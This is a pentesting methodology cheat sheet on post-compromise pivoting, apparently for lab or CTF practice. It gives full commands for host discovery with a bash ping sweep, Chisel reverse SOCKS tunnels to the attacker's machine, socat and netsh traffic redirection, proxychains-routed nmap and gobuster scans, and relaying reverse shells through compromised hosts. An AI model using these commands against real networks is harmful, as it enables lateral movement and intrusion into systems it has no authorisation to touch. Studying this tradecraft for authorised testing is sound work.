Linux Tools & Methedology

1. Network Interface Discovery

Once we compromise the victim machine we can discover new network interfaces.

Linux:

ip a

hostname -I

Windows:

ipconfig

arp -a

2. Hosts Discovery

Once we notice about new network interfaces we will try to discover new hosts in that network interface.

Linux:

Example: we have compromised ens33 = 192.168.111.41 and we discover a new network interface that is ens35 = 10.10.0.129 Now we have to discover other machines in that new interface so we are going to send packets to 10.10.0.1 to 10.10.0.254 we can do this for example with a simple bash script:

#!/bin/bash
			
function crtl_c(){
	echo -e "\n\n[!] Exiting … \n"
	exit 1
}
			
#Crtl+C
trap crtl_c INT
			
for i in $(seq 1 254); do
	timeout 1 bash -c "ping -c 1 10.10.0.$i" &> /dev/null && echo "[+] The host 10.10.0.$i - ACTIVE" &
done; wait

Windows:

The same example as before, but instead of creating a bash script we are going to use this powershell script: IPv4NetworkScan.ps1 (https://github.com/BornToBeRoot/PowerShell_IPv4NetworkScanner/blob/main/Scripts/IPv4NetworkScan.ps1)

./IPv4NetworkScan.ps1 -StartIPv4Address 10.10.0.0 -EndIPv4Address 10.10.0.254

or we can use:

1..254 | % {"10.9.15.$($): $(Test-Connection -count 1 -comp 10.9.15.$($) -quiet)"}

3. Pivoting

Once we know about other active hosts in the new network interface we are going to pivot them. For this we are going to tunnel the connection through the comprised machine to get acces to the new machine, then we are going to use the same methodology to exploit that machine.

• Neo-reGeorg (Password protected)

Once we have RCE on a web server, if this does not have visibility with internet (i.e. We can receive a shell to our C2), we could tunnel TCP over HTTP traffic to be able to access the internal network.

For this, Neo-reGeorg could be used (https://github.com/L-codes/Neo-reGeorg/blob/master/README-en.md).

• Chisel

First pivot:

Attacker:

Like in port forwarding we transfer the corresponging version to victim machine, we can reduce the size with: upx {chisel file}

chisel server --reverse -p 1234

Victim 1:

./chisel client {My IP}:1234 R:socks

Now we have acces to Victim 2

Second pivot:

Attacker:

Here we have this command running: chisel server --reverse -p 1234

Victim 1:

(Here we need to redirect traffic, more information about this in the last point "Traffic Redirection")

Here we have this command running: ./chisel client {My IP}:1234 R:socks

Now we have to spawn a new shell and run the following command:

socat TCP-LISTEN:{Incoming Port},fork TCP:{Attacker IP}:1234 (In the first pivot we've selected port 1234 to connect, now we need to select another, for example 4455)

Victim 2:

./chisel client {Victim 1 IP}:{New Port Selected} R:8888:socks (Here we select 8888 because the default chisel proxy (1080) is occupied

Now we have access to Victim 3

• Proxychains

To run commands through the tunnel we need to edit /etc/proxychains.conf then we can run commands through proxychains

First pivot:

strict_chain

socks5 127.0.0.1 1080 #1080 port is the default port in with chisel listens with socks

Second pivot:

dynamic_chain

socks5 127.0.0.1 {Port we have selected in chisel, for example 8888}

socks5 127.0.0.1 1080

Then to continue pivoting we leave the config in dynamic and we add the new proxies at the top of the proxy list.

• nmap

To use nmap thorugh proxychains we need to add -sT and -Pn parameters.

proxychains nmap -p- --open -T5 -v -n {IP} -sT -Pn 2>dev/null

Also to hide the proxychains output we can use proxychains -q {command} or in the previous command with grep:

proxychains nmap -p- --open -T5 -v -n {IP} -sT -Pn | grep -vE

Also we can use threads to make it faster because through various proxies it could be very slow:

seq 1 1000 | xargs -P 50 -I {} proxychains nmap -p- --open -T5 -v -n {IP} -sT -Pn --append-output -oG allPorts 2>&1| grep -vE "chain|Initiating|Starting|timeout|seconds|Read|Completed|Scanning"

seq 1 65535 | xargs -P 500 -I {} proxychains nmap -p- --open -T5 -v -n {IP} -sT -Pn 2>/dev/null| grep open

• gobuster

In gobuster we don't need to use proxychains before the command, it would also be very slow, we just need to add at the end of the command the parameter --proxy

Example: gobuster dir -u http://example.com -w /{dictionary} --proxy socks5 ://127.0.0.1:1080 (Here we select the port in which we have the tunnel, the same as proxychains, 1080 belongs to the first pivot, if we start a second pivot in port 8888, we should add a new one and select port 8888)

• Foxyproxy

To load a web through this tunnel we need to add the proxy to the browser, we can use foxyproxy addon.

Porxy Type: socks5

Proxy IP: 127.0.0.1

Port: 1080 (Here we select the port in which we have the tunnel, the same as proxychains, 1080 belongs to the first pivot, if we start a second pivot in port 8888, we should add a new one and select port 8888)

Now with one click we can switch to that proxy.

• BurpSuite

To use BurpSuite through a tunnel we must enable the option "Use SOCKS proxy" in User Options section and add the corresponding one (it matches with the proxychain.conf one) then in the web we need to enable BurpSuite proxy in FoxyProxy addon (HTTP proxy, 127.0.0.1:8080)

Also if gobuster doesn't work well we can enumerate with BurpSuite, to do this, we sent the petition to the intruder, add the payload position (the same as FUZZ if we were on wfuzz) and in payload options we load the directory we want (directory-list-2.3-medium.txt).

• Traffic Redirection

When we are tunneling and we are in an internal host from a machine, we can't reach our machine cause it's outside so we will need to redirect the traffic through all the internal hosts.

To redirect traffic in a Linux machine we use socat, is usually pre-installed, if not we can download the portable version:

socat TCP-LISTEN:{Incoming Port},fork TCP:{Outgoing IP}:{Outgoing PORT}

To redirect traffic in a Windows machine we use netsh:

netsh interface portproxy add v4tov4 listenport={Incoming Port} listenaddress=0.0.0.0 connectport={Outgoing PORT} connectaddress={Outgoing IP}

Examples of a reverse shell redirection:

Fistr option: Reverse shell in victim machine:

To receive a reverse shell from "Victim 2" we send the exploit to "Victim 2" IP, selecting "Victim 1" IP as the listen machine in the exploit and start a listener in "Victim 1" shell.

Second option: Reverse shell in our machine:

To receive a reverse shell from "Victim 2" we send the exploit to "Victim 2" IP selecting "Victim 1" IP as the listen machine in the exploit, then we start a listener in our machine and redirect the traffic in "Victim 1" to our machine.

Example of multiple pivots